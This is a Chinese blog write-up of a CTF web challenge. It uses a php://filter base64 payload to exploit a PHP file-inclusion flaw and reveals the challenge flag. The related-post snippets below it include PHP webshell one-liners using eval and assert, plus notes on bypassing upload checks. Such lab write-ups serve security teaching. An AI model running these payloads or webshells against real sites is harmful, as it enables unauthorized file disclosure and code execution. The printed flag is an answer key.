【BUUCTF】[ACTF2020 新生赛] IncludeWriteup

最新推荐文章于 2024-08-06 22:50:12 发布
最新推荐文章于 2024-08-06 22:50:12 发布
阅读量1.4k 收藏 4
点赞数 3
分类专栏: Web安全 文章标签: php filter 安全 ctf 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/vanarrow/article/details/108177243
版权

【BUUCTF】[ACTF2020 新生赛]Include

0x00 知识点

  • ?file=flag.php 猜测文件包含漏洞

  • php://filter与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,阻止其不执行。从而导致任意文件读取。

  • php://filter 伪协议文件包含读取源代码,加上read=convert.base64-encode,用base64编码输出,不然会直接当做php代码执行,看不到源代码内容。

  • php://input 伪协议 + POST发送PHP代码 (不行)

在这里插入图片描述

0x01 解题

在这里插入图片描述
在这里插入图片描述

?file=php://filter/read=convert.base64-encode/resource=flag.php

PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7YWUyM2EzZWItM2FkNS00NzMzLWI1NGUtOTkzMjJlOTc1NTk5fQo=

在这里插入图片描述

<?php
echo "Can you find out the flag?";
//flag{ae23a3eb-3ad5-4733-b54e-99322e975599}

flag{ae23a3eb-3ad5-4733-b54e-99322e975599}

你们这样一点都不可耐
关注
专栏目录
BUUCTF[ACTF2020 新生]Include
楼阁de猫的博客
12-17 218
[ACTF2020 新生]Include 有一个tips标签,指向的是?file=flag.php 看到?file,应该首先想到的是文件包含 先读取源码,构造payload http://8cf4eecb-8bfa-4e2b-8616-b609fa0e7d3f.node3.buuoj.cn/?file=php://filter/convert.base64-encode/resource=index.php 发现了一串base64,解码得到 <meta charset="utf8">
BUUCTF-Web- [ACTF2020 新生]Upload
weixin_67813445的博客
03-14 178
本题考察文件上传前端校验以及.phtml的用法
BUUCTF:[ACTF2020 新生]Include
末初的CSDN博客
10-06 828
题目地址:https://buuoj.cn/challenges#[ACTF2020%20%E6%96%B0%E7%94%9F%E8%B5%9B]Include 文件包含直接伪协议读取flag.php ?file=php://filter/convert.base64-encode/resource=flag.php PS C:\Users\Administrator> php -r "var_dump(base64_decode('PD9waHAKZWNobyAiQ2FuIHlvdSBma.
WebShell及一句话木马
最新发布
qq_67812668的博客
08-06 910
1.一句话木马的原理将一句话木马插入到asp文件中(包括asa.cdx.cer文件),该语句将会作为触发,接收入侵者通过客户端提交的数据,执行并完成相应的入侵操作。客户端则用来向服务端提交控制数据,提交的数据通过服务端构成完整的asp功能语句并执行,也就是生成我们所需要的asp木马文件。 2.通常WebShell客户端怎么绕过WAF1).绕过前台脚本检测扩展名上传Webshell当用户在客户端上传文件的时候,客户端与服务器没有进行任何的信息交互,判断上传文件的类型是前台脚本文件来判断。
[ACTF2020 新生]Include
chang113的博客
06-13 656
[ACTF2020 新生]Include
Buuctf-Web-[ACTF2020 新生]Include
御七彩虹猫
05-13 505
Buuctf-Web-[ACTF2020 新生]Include
[ACTF2020 新生]Include1
anyhowanywhere的博客
09-26 302
[ACTF2020 新生]Include1
BUUCTF-Web-[ACTF2020新生]Upload
m0_61851859的博客
03-27 437
4.打开burpsuite进行抓包,修改为php文件类型并将数据包发送回去,发现上传失败。5. 考虑是不是网站对php后缀进行过滤,采取黑名单绕过修改文件后缀为.phtml,上传成功。3.将文件后缀名修改为.jpg类型上传文件,上传成功。(但此时文件有错木马无法连接)1.打开题目在小灯泡那发现了文件上传,因此猜测存在文件上传漏洞。2.尝试上传一句话木马,上传失败仅允许上传弹窗提示的文件类型。7.连接成功并找到flag。6.使用蚁剑进行连接。
BUUCTF-Web:[ACTF2020 新生]Upload
m0_56161093的博客
05-30 1127
题目 解题过程 1、上传文件 从网页上来看,可以上传文件,我们尝试上传一个PHP一句话木马。结果如下: 提示我们只能上传图片类型的文件,尝试用burpsuite抓包,发现同样有弹窗,但没有抓到数据。所以这里猜测这里是前端JS进行校验的 2、绕过前端校验 方法一 禁用一下 js 再提交,就可以绕过了 方法二 修改PHP后缀为图片的后缀然后上传,再重新抓包修改后缀 修改前: 修改后: 上传结果如下: 可以看到上传失败,应该是服务器端对上传的文件进行了校验。 3、绕过上传黑名单 常规PHP文件后缀
ACTF2020 新生 Upload 1
qq_52715164的博客
04-20 3936
打开网页发现是个文件上传的页面,试着上传php文件,发现不行后, 尝试burp抓包,修改文件后缀,进行前端绕过,发现可行。 具体步骤如下: 1、书写一句话木马,例如: eval和assert: php任意代码执行的一句话后门,我们喜欢用的是传统的eval,php5,7通用。 <?php @eval($_GET["cmd"]); ?> <?php @assert($_POST['a']) ?> create_function和preg_replace函数: create_func
BUUCTF-[ACTF2020 新生]Include 1 write up
m0_62851980的博客
04-05 1664
先打开靶机, ctrl+u查看一下页面源代码: “?file=flag.php”表示这里应该有文件包含漏洞 ,页面调用了include语句,那么我们使用php伪协议中的php://filter php://filter可以获取指定文件源码。当它与include函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致任意文件读取。 php://filter可以使用不同的参数来达到不同的作用: resource(要过滤的数据流):必写.
buuctf [ACTF2020 新生]Include 1
Recyvan的博客
10-15 947
[ACTF2020 新生]Include 1
BUUCTFACTF2020 新生Include1 write up
GZWZ_的博客
03-30 3082
鉴于前几篇wp写的有些过于小白,我以后会改的┭┮﹏┭┮(web本就逆天,死在路上很正常)!
BUUCTF Web [ACTF2020 新生]Include
热门推荐
wangyuxiang946的博客
10-27 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [ACTF2020 新生]Include一、题目简介二、思路分析三、解题步骤1)包含 flag.php2)PHP伪协议编码文件3)解码文件内容四、总结 一、题目简介 进入题目链接后只有一个「链接」 点击链接后来到 falg.php 页面,里面是一句作者深情的「问候」。 二、.
buuctf ACTF2020 Include
09-16
根据提供的引用内容,buuctf ACTF2020Include功能可能存在文件包含漏洞。通过将URL中的参数修改为"?file=php://filter/convert.base64-encode/resource=flag.php",可以尝试读取flag.php文件并将其内容以Base64...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值